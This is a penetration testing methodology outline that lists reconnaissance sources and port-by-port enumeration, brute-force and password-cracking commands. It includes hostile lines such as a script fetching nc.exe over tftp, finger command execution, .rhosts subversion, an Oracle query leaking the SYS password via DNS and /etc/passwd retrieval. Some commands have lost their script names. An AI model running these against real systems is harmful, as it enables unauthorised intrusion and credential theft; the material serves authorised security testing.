Penetration Testing Framework 0.58


1. Manual Testing

1.1. Create Batch File (cmd.bat)

1.1.1. 1 cmd.exe

1.1.2. 2 echo off command echo on

1.2. Host Scripting File (cmd.vbs)

1.2.1. Option Explicit

1.2.2. Dim objShell

1.2.3. objShell.Run "%comspec% /k"

1.2.4. WScript.Quit

1.2.5. Alternative functionality:
    objShell.Run "%comspec% /k c: & dir"
    objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt"
    objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe" :-)

1.3. iKat

1.3.1. Integrated Kiosk Attack Tool: Reconnaissance, FileSystem Links, Common Dialogs, Application Handlers, Browser Plugins, iKAT Tools

1.4. AT Command - privilege escalation

1.4.1. AT HH:MM /interactive "cmd.exe"

1.4.2. AT HH:MM /interactive %comspec% /k


1.5. Keyboard Shortcuts/ Hotkeys

1.5.1. Ctrl + h – View History

1.5.2. Ctrl + n – New Browser

1.5.3. Shift + Left Click – New Browser

1.5.4. Ctrl + o – Internet Address (browse feature)

1.5.5. Ctrl + p – Print (to file)

1.5.6. Right Click (Shift + F10) – Save Image As, View Source

1.5.7. F1 – Jump to URL

1.5.8. SHIFT+F1: Local Task List

1.5.9. SHIFT+F2: Toggle Title Bar

1.5.10. SHIFT+F3: Close Remote Application

1.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del

1.5.12. CTRL+F2: Remote Task List

1.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC

1.5.14. ALT+F2: Cycle through programs

1.5.15. ALT+PLUS: Alt+TAB


2. inurl:Citrix/AccessPlatform/auth/login.aspx

3. X11 port 6000^ open

3.1. X11 Enumeration

3.1.1. List open windows

3.1.2. Authentication method: Xauth, Xhost

3.2. X11 Exploitation

3.2.1. xwd: xwd -display <display> -root -out <output_file>

3.2.2. Keystrokes (received/ transmitted)

3.2.3. Screenshots

3.2.4. xhost +

3.3. Examine Configuration Files

3.3.1. /etc/Xn.hosts

3.3.2. /usr/lib/X11/xdm

3.3.3. /usr/lib/X11/xdm/xsession

3.3.4. /usr/lib/X11/xdm/xsession-remote

3.3.5. /usr/lib/X11/xdm/xsession.0

3.3.6. /usr/lib/X11/xdm/xdm-config (DisplayManager*authorize: on)

4. pwdump [-h][-o][-u][-p] machineName

5. Nabil contributed the AS/400 section.

6. Client Side Security

7. Back end files

7.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf

8. Set objShell = CreateObject("WScript.Shell")

9. Check visible areas for sensitive information.

10. InitialProgram=c:\windows\system32\cmd.exe

11. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c:\hostlist.txt


13. Pre-Inspection Visit - template

14. Network Footprinting (Reconnaissance) - The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms, active and passive. A passive approach is always the best starting point, as this would normally defeat intrusion detection systems and other forms of protection afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser, visiting newsgroups etc. An active form would be more intrusive, may show up in audit logs, and may take the form of an attempted DNS zone transfer or a social engineering type of attack.

14.1. Untitled

14.1.1. Authoritative Bodies
    IANA - Internet Assigned Numbers Authority
    ICANN - Internet Corporation for Assigned Names and Numbers
    NRO - Number Resource Organisation
    RIR - Regional Internet Registry
    AFRINIC - African Network Information Centre
    APNIC - Asia Pacific Network Information Centre
    ARIN - American Registry for Internet Numbers
    LACNIC - Latin America & Caribbean Network Information Centre
    RIPE - Réseaux IP Européens Network Coordination Centre

14.1.2. Websites
    Central Ops - Domain Dossier, Email Dossier
    DNS Stuff - Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.
    Fixed Orbit - Autonomous System lookups and other online tools available.
    Geektools
    IP2Location - Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.
    Kartoo - Metasearch engine that visually presents its results.
    Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution
    Excellent site that can be used if the above is down
    Netcraft - Online search tool allowing queries for host information.
    Passive DNS Replication - Finds shared domains based on supplied IP addresses. Note: website utilised by the nmap hostmap.nse script
    Robtex - Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results, with pointers, A, MX records and AS connectivity displayed. Note: can be unreliable with old entries (use CentralOps to verify)
    Website listing a large number of links to online traceroute resources.
    Wayback Machine - Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.

14.1.3. Tools: Cheops-ng, Country whois, Domain Research Tool, Firefox Plugins (AS Number, Shazou), Firecat Suite, Gnetutil, Goolag Scanner, Greenwich, Maltego, GTWhois, Sam Spade, Smart whois, SpiderFoot

14.2. Internet Search

14.2.1. General Information: Web Investigator, Tracesmart, Friends Reunited, Ebay - profiles etc.

14.2.2. Financial: EDGAR - Company information, including real-time filings (US); Google Finance - General Finance Portal; Hoovers - Business Intelligence, Insight and Results (US and UK); Companies House (UK); Land Registry (UK)

14.2.3. Phone book/ Electoral Roll Information: 123people; Electoral Roll Search (UK); 411 - Online White Pages and Yellow Pages (US); Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search (US); UK Residential; Business; Pipl; Spokeo; Yasni; Zabasearch - People Search Engine (US)

14.2.4. Generic Web Searching: Code Search, Forum Entries, Google Hacking Database, Google (Email Addresses, Contact Details), Newsgroups/forums, Blog Search (Yammer, Google Blog Search, Technorati, Jaiku, Twitter Network Browser), Search Engine Comparison/ Aggregator Sites (Clusty, Grokker, Zuula, Exalead, Delicious)

14.2.5. Metadata Search: MetaData Visualisation Sites, Tools, Wikipedia Metadata Search

14.2.6. Social/ Business Networks: Africa, Australia, Belgium, Holland, Hungary, Iran, Japan, Korea, Poland, Russia, Sweden, UK, US, Assorted

14.2.7. Resources: OSINT, International Directory of Search Engines

14.3. DNS Record Retrieval from publicly available servers

14.3.1. Types of Information Records
    SOA Records - Indicates the server that has authority for the domain.
    MX Records - List of a host's or domain's mail exchanger server(s).
    NS Records - List of a host's or domain's name server(s).
    A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.
    PTR Records - Lists a host's domain name, host identified by its IP address.
    SRV Records - Service location record.
    HINFO Records - Host information record with CPU type and operating system.
    TXT Records - Generic text record.
    CNAME - A host's canonical name allows additional names/ aliases to be used to locate a computer.
    RP - Responsible person for the domain.

14.3.2. Database Settings: version.bind; SOA fields: Serial, Refresh, Retry, Expiry, Minimum

14.3.3. Sub Domains

14.3.4. Internal IP ranges: Reverse DNS for IP Range

14.3.5. Zone Transfer

14.4. Social Engineering

14.4.1. Remote: Phone - Scenarios, Results, Contact Details; Email - Scenarios, Software, Results, Contact Details; Other

14.4.2. Local: Personas - Name, Phone, Email, Business Cards; Contact Details - Name, Phone number, Email, Room number, Department, Role; Scenarios - New IT employee, Fire Inspector; Results - Maps, Satellite Imagery, Building layouts, Other

14.5. Dumpster Diving

14.5.1. Rubbish Bins

14.5.2. Contract Waste Removal

14.5.3. Ebay ex-stock sales i.e. HDD

14.6. Web Site copy

14.6.1. httrack

14.6.2. teleport pro

14.6.3. Black Widow

15. Discovery & Probing - Enumeration can serve two distinct purposes in an assessment: OS fingerprinting and identifying the remote applications being served. OS fingerprinting, or TCP/IP stack fingerprinting, is the process of determining the operating system being utilised on a remote host. This is carried out by analysing packets received from the host in question. There are two distinct ways to OS fingerprint: actively (e.g. nmap) or passively (e.g. scanrand). Passive OS fingerprinting determines the remote OS from the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy: it requires packets to be sent to the remote host and waits for a reply (or lack thereof). Disparate OSs respond differently to certain types of packet (the response is governed by an RFC and any proprietary responses the vendor, notably Microsoft, has enabled within the system), and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.

15.1. Default Port Lists

15.1.1. Windows

15.1.2. *nix

15.2. Enumeration tools and techniques - The vast majority can be used generically; however, certain bespoke applications require their own specific toolsets. Default passwords are platform and vendor specific.

15.2.1. General Enumeration Tools
    nmap
        nmap -n -A -PN -p- -T aggressive -iL nmap.targetlist -oX nmap.syn.results.xml
        nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
        nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
        nmap -A -sS -PN -n --script:all ip_address --reason
        grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list
    netcat
        nc -v -n IP_Address port
        nc -v -w 2 -z IP_Address port_range/port_number
    amap
        amap -bqv 80
        amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
    xprobe2
        xprobe2
    sinfp
        ./ -i -p
    nbtscan
        nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
    hping
        hping ip_address
    scanrand
        scanrand ip_address:all
    unicornscan
        unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E
    netenum
        netenum network/netmask timeout
    fping
        fping -a -d hostname/ (Network/Subnet_Mask)

15.2.2. Firewall Specific Tools
    firewalk
        firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
    ftester
        host 1: ./ftestd -i eth0 -v
        host 2: ./ftest -f ftest.conf -v -d 0.01
        then: ./freport ftest.log ftestd.log

15.2.3. Default Passwords (examine list): Passwords A to Z, Passwords (Numeric)

15.3. Active Hosts

15.3.1. Open TCP Ports

15.3.2. Closed TCP Ports

15.3.3. Open UDP Ports

15.3.4. Closed UDP Ports

15.3.5. Service Probing: SMTP Mail Bouncing; Banner Grabbing - Other, HTTP, HTTPS, SMTP, POP3, FTP

15.3.6. ICMP Responses: Type 3 (Port Unreachable), Type 8 (Echo Request), Type 13 (Timestamp Request), Type 15 (Information Request), Type 17 (Subnet Address Mask Request), Responses from broadcast address

15.3.7. Source Port Scans: TCP/UDP 53 (DNS), TCP 20 (FTP Data), TCP 80 (HTTP), TCP/UDP 88 (Kerberos)

15.3.8. Firewall Assessment: Firewalk, TCP/UDP/ICMP responses

15.3.9. OS Fingerprint

16. Enumeration

16.1. Daytime port 13 open

16.1.1. nmap nse script daytime

16.2. FTP port 21 open

16.2.1. Fingerprint server
    telnet ip_address 21 (banner grab)
    Run command: ftp ip_address [email protected]
    Check for anonymous access: ftp ip_address, Username: anonymous OR anon, Password: [email protected]

16.2.2. Password guessing: Hydra brute force, medusa, Brutus

16.2.3. Examine configuration files: ftpusers, ftp.conf, proftpd.conf

16.2.4. MiTM

16.3. SSH port 22 open

16.3.1. Fingerprint server
    telnet ip_address 22 (banner grab)
    scanssh: scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

16.3.2. Password guessing
    ssh [email protected]_address
    guess-who: ./b -l username -h ip_address -p 22 -2 < password_file_location
    Hydra brute force
    brutessh
    Ruby SSH Bruteforcer

16.3.3. Examine configuration files: ssh_config, sshd_config, authorized_keys, ssh_known_hosts, .shosts

16.3.4. SSH Client programs: tunnelier, winsshd, putty, winscp

16.4. Telnet port 23 open

16.4.1. Fingerprint server
    telnet ip_address
    Common banner list (OS / banner):
        Solaris 8 / SunOS 5.8
        Solaris 2.6 / SunOS 5.6
        Solaris 2.4 or 2.5.1 / Unix(r) System V Release 4.0 (hostname)
        SunOS 4.1.x / SunOS Unix (hostname)
        FreeBSD / FreeBSD/i386 (hostname) (ttyp1)
        NetBSD / NetBSD/i386 (hostname) (ttyp1)
        OpenBSD / OpenBSD/i386 (hostname) (ttyp1)
        Red Hat 8.0 / Red Hat Linux release 8.0 (Psyche)
        Debian 3.0 / Debian GNU/Linux 3.0 / hostname
        SGI IRIX 6.x / IRIX (hostname)
        IBM AIX 4.1.x / AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.
        IBM AIX 4.2.x or 4.3.x / AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.
        Nokia IPSO / IPSO (hostname) (ttyp0)
        Cisco IOS / User Access Verification
        Livingston ComOS / ComOS - Livingston PortMaster
    telnetfp

16.4.2. Password Attack: Brutus; Hydra brute force; telnet -l "-froot" hostname (Solaris 10+)

16.4.3. Examine configuration files: /etc/xinetd.d/telnet, /etc/xinetd.d/stelnet

16.5. Sendmail Port 25 open

16.5.1. Fingerprint server telnet ip_address 25 (banner grab)

16.5.2. Mail Server Testing
    Enumerate users:
        VRFY username (verifies if username exists - enumeration of accounts)
        EXPN username (verifies if username is valid - enumeration of accounts)
    Mail Spoof Test:
        HELO anything
        MAIL FROM: spoofed_address
        RCPT TO: valid_mail_account
        DATA
        .
        QUIT
    /etc/inetd.conf
    Mail Relay Test

16.5.3. Examine Configuration Files

16.6. DNS port 53 open

16.6.1. Fingerprint server/ service
    host
        host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server]
        -v verbose format
        -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR.
        -a Same as -t ANY.
        -l Zone transfer (if allowed).
        -f Save to a specified filename.
    nslookup
        nslookup [-option ...] [host-to-find | - [server]]
    dig
        dig [@server] [-b address] [-c class] [-f filename] [-k filename] [-p port#] [-t type] [-x addr] [-y name:key] [-4] [-6] [name] [type] [class] [queryopt...]
    whois
        -h Use the named host to resolve the query
        -a Use ARIN to resolve the query
        -r Use RIPE to resolve the query
        -p Use APNIC to resolve the query
        -Q Perform a quick lookup

16.6.2. DNS Enumeration
    Bile Suite
        perl [website] [project_name]
        perl [website] [input file]
        perl [input file] [true domain file] [output file] <range>
        perl [input file] [true domain file] [output file]
        perl [input file] [output file]
        perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
        perl jarf-rev [subnetblock] [nameserver]
    txdns
        txdns -rt -t domain_name
        txdns -x 50 -bb domain_name
    nmap nse scripts: dns-random-srcport, dns-random-txid, dns-recursion, dns-zone-transfer

16.6.3. Examine Configuration Files: host.conf, resolv.conf, named.conf

16.7. perl [ip_address_file] [output_file]

16.8. TFTP port 69 open

16.8.1. TFTP Enumeration
    tftp ip_address PUT local_file
    tftp ip_address GET conf.txt (or other files)
    Solarwinds TFTP server
    tftp -i <IP> GET /etc/passwd (old Solaris)

16.8.2. TFTP Bruteforcing: TFTP bruteforcer, Cisco-Torch

16.9. Finger Port 79 open

16.9.1. User enumeration
    finger 'a b c d e f g h'
    finger [email protected]
    finger [email protected]
    finger [email protected]
    finger [email protected]
    finger **
    finger [email protected]
    finger
    nmap nse script finger

16.9.2. Command execution: finger "|/bin/[email protected]"; finger "|/bin/ls -a /"

16.9.3. Finger Bounce: finger [email protected]@victim; finger @[email protected]

16.10. Web Ports 80,8080 etc. open

16.10.1. Fingerprint server: Telnet ip_address port; Firefox plugins (All, Specific)

16.10.2. Crawl website
    lynx [options] startfile/URL (options include -traversal -crawl -dump -image_links -source)
    httprint
    Metagoofil -d [domain] -l [no. of] -f [type] -o results.html

16.10.3. Web Directory enumeration: Nikto - nikto [-h target] [options]; DirBuster; Wikto; Goolag Scanner

16.10.4. Vulnerability Assessment: Manual Tests - Default Passwords, Install Backdoors, Method Testing, Upload Files, View Page Source, Input Validation Checks, Automated table and column iteration; Vulnerability Scanners - Acunetix, Grendelscan, NStealth, Obiwan III, w3af; Specific Applications/ Server Tools - Domino, Joomla, Vbulletin, ZyXel

16.10.5. Proxy Testing: Burpsuite, Crowbar, Interceptor, Paros, Requester Raw, Suru, WebScarab

16.10.6. Examine configuration files
    Generic: Examine httpd.conf/ windows config files
    JBoss: JMX Console http://<IP>:8080/jmx-console/
    Joomla: configuration.php, diagnostics.php
    Mambo: configuration.php
    Wordpress: setup-config.php, wp-config.php
    ZyXel:
        /WAN.html (contains PPPoE ISP password)
        /WLAN_General.html and /WLAN.html (contains WEP key)
        /rpDyDNS.html (contains DDNS credentials)
        /Firewall_DefPolicy.html (Firewall)
        /CF_Keyword.html (Content Filter)
        /RemMagWWW.html (Remote MGMT)
        /rpSysAdmin.html (System)
        /LAN_IP.html (LAN)
        /NAT_General.html (NAT)
        /ViewLog.html (Logs)
        /rpFWUpload.html (Tools)
        /DiagGeneral.html (Diagnostic)
        /RemMagSNMP.html (SNMP Passwords)
        /LAN_ClientList.html (Current DHCP Leases)
    Config Backups

16.10.7. Examine web server logs
    c:\winnt\system32\Logfiles\W3SVC1
    awk -F " " '{print $3,$11}' filename | sort | uniq

16.10.8. References
    White Papers:
        Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
        Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
        Blind Security Testing - An Evolutionary Approach
        Command Injection in XML Signatures and Encryption
        Input Validation Cheat Sheet
        SQL Injection Cheat Sheet
    Books:
        Hacking Exposed Web 2.0
        Hacking Exposed Web Applications
        The Web Application Hacker's Handbook

16.10.9. Exploit Frameworks: Brute-force Tools, Acunetix, Metasploit, w3af

16.11. Portmapper port 111 open

16.11.1. username:[email protected]_Address port/protocol (i.e. 80/HTTP)

16.11.2. rpcinfo: rpcinfo [options] IP_Address

16.12. NTP Port 123 open

16.12.1. NTP Enumeration
    ntpdc -c monlist IP_ADDRESS
    ntpdc -c sysinfo IP_ADDRESS
    ntpq: host hostname, ntpversion, readlist, version

16.12.2. Examine configuration files ntp.conf

16.12.3. nmap nse script ntp-info

16.13. NetBIOS Ports 135-139,445 open

16.13.1. NetBIOS enumeration
    Enum: enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
    Null Session: net use \\<IP>\ipc$ "" /u:""
    Smbclient: smbclient -L //server/share password options
    Superscan: Enumeration tab.
    user2sid/sid2user
    Winfo

16.13.2. NetBIOS brute force: Hydra, Brutus, Cain & Abel, getacct, NAT (NetBIOS Auditing Tool)

16.13.3. Examine Configuration Files: smb.conf, lmhosts

16.14. SNMP port 161 open

16.14.1. Default Community Strings: public, private, cisco, cable-docsis, ILMI

16.14.2. MIB enumeration
    Windows NT: Hostnames, Domain Name, Usernames, Running Services, Share Information
    Solarwinds MIB walk
    Getif
    snmpwalk: snmpwalk -v <Version> -c <Community string> <IP>
    Snscan
    Applications: ZyXel
    nmap nse script snmp-sysdescr

16.14.3. SNMP Bruteforce
    onesixtyone: onesixtyone -c SNMP.wordlist <IP>
    cat: ./cat -h <IP> -w SNMP.wordlist
    Solarwinds SNMP Brute Force
    ADMsnmp
    nmap nse script snmp-brute

16.14.4. Examine SNMP Configuration files: snmp.conf, snmpd.conf, snmp-config.xml

16.15. LDAP Port 389 Open

16.15.1. ldap enumeration
    ldapminer: ldapminer -h ip_address -p port (not required if default) -d
    luma: Gui based tool
    ldp: Gui based tool
    openldap:
        ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
        ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
        ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
        ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
        ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

16.15.2. ldap brute force
    bf_ldap: bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate
        optional: -p port (default 389), -v (verbose mode), -P Ldap user path (default ,CN=Users,)
    K0ldS

16.15.3. Examine Configuration Files
    General: containers.ldif, ldap.cfg, ldap.conf, ldap.xml, ldap-config.xml, ldap-realm.xml, slapd.conf
    IBM SecureWay V3 server
    Microsoft Active Directory server: msadClassesAttrs.ldif
    Netscape Directory Server 4: nsslapd.sas_at.conf, nsslapd.sas_oc.conf
    OpenLDAP directory server: slapd.sas_at.conf, slapd.sas_oc.conf
    Sun ONE Directory Server 5.1: 75sas.ldif

16.16. PPTP/L2TP/VPN port 500/1723 open

16.16.1. Enumeration: ike-scan, ike-probe

16.16.2. Brute-Force ike-crack

16.16.3. Reference Material: PSK cracking paper; SecurityFocus Infocus - Scanning a VPN Implementation

16.17. Modbus port 502 open

16.17.1. modscan

16.18. rlogin port 513 open

16.18.1. Rlogin Enumeration
    Find the files: find / -name .rhosts; locate .rhosts
    Examine files: cat .rhosts
    Manual login: rlogin hostname -l username; rlogin <IP>
    Subvert the files: echo ++ > .rhosts

16.18.2. Rlogin Brute force Hydra

16.19. rsh port 514 open

16.19.1. Rsh Enumeration rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

16.19.2. Rsh Brute Force: rsh-grind, Hydra, medusa

16.20. SQL Server Port 1433 1434 open

16.20.1. SQL Enumeration: piggy; SQLPing - sqlping ip_address/hostname; SQLPing2; SQLPing3; SQLpoke; SQL Recon; SQLver

16.20.2. SQL Brute Force
    SQLPAT:
        sqlbf -u hashes.txt -d dictionary.dic -r out.rep (Dictionary Attack)
        sqlbf -u hashes.txt -c -r out.rep (Brute-Force Attack)
    SQL Dict
    SQLAT
    Hydra
    SQLlhf
    ForceSQL

16.21. Citrix port 1494 open

16.21.1. Citrix Enumeration: Default Domain; Published Applications - ./citrix-pa-scan {IP_address/file | - | random} [timeout] IP_to_proxy_to [Local_IP]

16.21.2. Citrix Brute Force: bforce.js, connect.js, Citrix Brute-forcer; Reference Material - Hacking Citrix: the legitimate backdoor; Hacking Citrix: the forceful way

16.22. Oracle Port 1521 Open

16.22.1. Oracle Enumeration
    oracsec
    Repscan
    Sidguess
    Scuba
    DNS/HTTP Enumeration:
        SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'') FROM DUAL;
    WinSID
    Oracle default password list
    TNSVer: tnsver host [port]
    TCP Scan
    Oracle TNSLSNR will respond to: ping, version, status, service, change_password, help, reload, save_config, set log_directory, set display_mode, set log_file, show, spawn, stop
    TNSCmd:
        perl -h ip_address
        perl version -h ip_address
        perl status -h ip_address
        perl -h ip_address --cmdsize (40 - 200)
    LSNrCheck
    Oracle Security Check (needs credentials)
    OAT:
        sh -s ip_address
        opwg.bat -s ip_address
        sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
    OScanner:
        sh -s ip_address
        oscanner.exe -s ip_address
        sh oscanner_saved_file.xml
        reportviewer.exe oscanner_saved_file.xml
    NGS Squirrel for Oracle
    Service Register: Service-register.exe ip_address
    PLSQL Scanner 2008

16.22.2. Oracle Brute Force
    OAK:
        ora-getsid hostname port sid_dictionary_list
        ora-auth-alter-session host port sid username password sql
        ora-brutesid host port start
        ora-pwdbrute host port sid username password-file
        ora-userenum host port sid userlistfile
        ora-ver -e (-f -l -a) host port
    breakable (Targets Application Server Port): breakable.exe host url [port] [v]
        host: ip_address of the Oracle Portal Server
        url: PATH_INFO i.e. /pls/orasso
        port: TCP port Oracle Portal Server is serving pages from
        v: verbose
    SQLInjector (Targets Application Server Port):
        sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
        sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
    Check Password:
        orabf: orabf [hash]:[username] [options]
        thc-orakel: Cracker, Client, Crypto
    DBVisualisor: Sql scripts from
    Manual sql input of previously reported vulnerabilities

16.22.3. Oracle Reference Material: Understanding SQL Injection, SQL Injection walkthrough, SQL Injection by example, Advanced SQL Injection in Oracle databases, Blind SQL Injection, SQL Cheatsheets

16.23. NFS Port 2049 open

16.23.1. NFS Enumeration
    showmount -e hostname/ip_address
    mount -t nfs ip_address:/directory_found_exported /local_mount_point

16.23.2. NFS Brute Force: Interact with NFS share and try to add/delete; Exploit and Confuse Unix

16.23.3. Examine Configuration Files: /etc/exports, /etc/lib/nfs/xtab

16.23.4. nmap nse script nfs-showmount

16.24. Compaq/HP Insight Manager Port 2301, 2381 open

16.24.1. HP Enumeration: Authentication Method - Host OS Authentication, Default Authentication; Wikto; Nstealth

16.24.2. HP Bruteforce: Hydra, Acunetix

16.24.3. Examine Configuration Files: mx.log, CLIClientConfig.cfg, database.props, pg_hba.conf, jboss-service.xml, .namazurc

16.25. MySQL port 3306 open

16.25.1. Enumeration
    nmap -A -n -p3306 <IP Address>
    nmap -A -n -PN --script:ALL -p3306 <IP Address>
    telnet IP_Address 3306
    use test; select * from test;
    To check for other DBs -- show databases

16.25.2. Administration: MySQL Network Scanner, MySQL GUI Tools, mysqlshow, mysqlbinlog

16.25.3. Manual Checks
    Default usernames and passwords: username: root, password: testing
    Configuration Files
    Operating System
    Command History
    Log Files
    To run many sql commands at once -- mysql -u username -p < manycommands.sql
    MySQL data directory (location specified in my.cnf)
    SSL Check
    Privilege Escalation: Current level of access, Access passwords, Create a new user and grant him privileges, Break into a shell

16.25.4. SQL injection http://target/ expected_string database

16.25.5. References / Design Weaknesses: MySQL running as root; Exposed publicly on Internet

16.26. RDesktop port 3389 open

16.26.1. Rdesktop Enumeration Remote Desktop Connection

16.26.2. Rdesktop Bruteforce
    TSGrinder: tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
    Tscrack

16.27. Sybase Port 5000+ open

16.27.1. Sybase Enumeration: sybase-version ip_address (from NGS)

16.27.2. Sybase Vulnerability Assessment: Use DBVisualiser; Sybase Security checksheet; Manual sql input of previously reported vulnerabilities; NGS Squirrel for Sybase

16.28. SIP Port 5060 open

16.28.1. SIP Enumeration
    netcat: nc IP_Address Port
    sipflanker: python 192.168.1-254
    Sipscan
    smap:
        smap IP_Address/Subnet_Mask
        smap -o IP_Address/Subnet_Mask
        smap -l IP_Address

16.28.2. SIP Packet Crafting etc.
    sipsak:
        Tracing paths: sipsak -T -s sip:[email protected]
        Options request: sipsak -vv -s sip:[email protected]
        Query registered bindings: sipsak -I -C empty -a password -s sip:[email protected]
    siprogue

16.28.3. SIP Vulnerability Scanning/ Brute Force: tftp bruteforcer - Default dictionary file, ./ IP_Address Dictionary_file Maximum_Processes; VoIPaudit; SiVuS

16.28.4. Examine Configuration Files: SIPDefault.cnf, asterisk.conf, sip.conf, phone.conf, sip_notify.conf, <Ethernet address>.cfg, 000000000000.cfg, phone1.cfg, sip.cfg, etc.

16.29. VNC port 5900^ open

16.29.1. VNC Enumeration: scan 5900^ for direct access, 5800 for HTTP access.

16.29.2. VNC Brute Force: Password Attacks - Remote, Local

16.29.3. Examine Configuration Files: .vnc, /etc/vnc/config, $HOME/.vnc/config, /etc/sysconfig/vncservers, /etc/vnc.conf

16.30. Tor Port 9001, 9030 open

16.30.1. Tor Node Checker Ip Pages

16.30.2. nmap NSE script

16.31. Jet Direct 9100 open

16.31.1. hijetta

17. Password cracking

17.1. Rainbow crack

17.1.1. ophcrack

17.1.2. rainbow tables rcrack c:\rainbowcrack\*.rt -f pwfile.txt

17.2. Ophcrack

17.3. Cain & Abel

17.4. John the Ripper

17.4.1. ./unshadow passwd shadow > file_to_crack

17.4.2. ./john -single file_to_crack

17.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack

17.4.4. ./john -show file_to_crack

17.4.5. ./john --incremental:All file_to_crack

17.5. fgdump

17.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt

17.6. pwdump6

17.7. medusa

17.8. LCP

17.9. L0phtcrack (Note: this tool was acquired by Symantec from @Stake and it is their policy not to ship outside the USA and Canada)

17.9.1. Domain credentials

17.9.2. Sniffing

17.9.3. pwdump import

17.9.4. sam import

17.10. aiocracker

17.10.1. [md5, sha1, sha256, sha384, sha512] hash dictionary_list

18. Vulnerability Assessment - Utilising vulnerability scanners, all discovered hosts can then be tested for vulnerabilities. The results are then analysed to determine whether there are any vulnerabilities that could be exploited to gain access to a target host on the network. A number of the tests carried out by these scanners are just banner grabbing/ obtaining version information; once these details are known, the version is compared with any Common Vulnerabilities and Exploits (CVE) that have been released and the result is reported to the user. Other tools actually use manual pen testing methods and display the output received, i.e. showmount -e ip_address would display the NFS shares available to the scanner, which would then need to be verified by the tester.

18.1. Manual

18.1.1. Patch Levels

18.1.2. Confirmed Vulnerabilities: Severe, High, Medium, Low

18.2. Automated

18.2.1. Reports

18.2.2. Vulnerabilities: Severe, High, Medium, Low

18.3. Tools

18.3.1. GFI

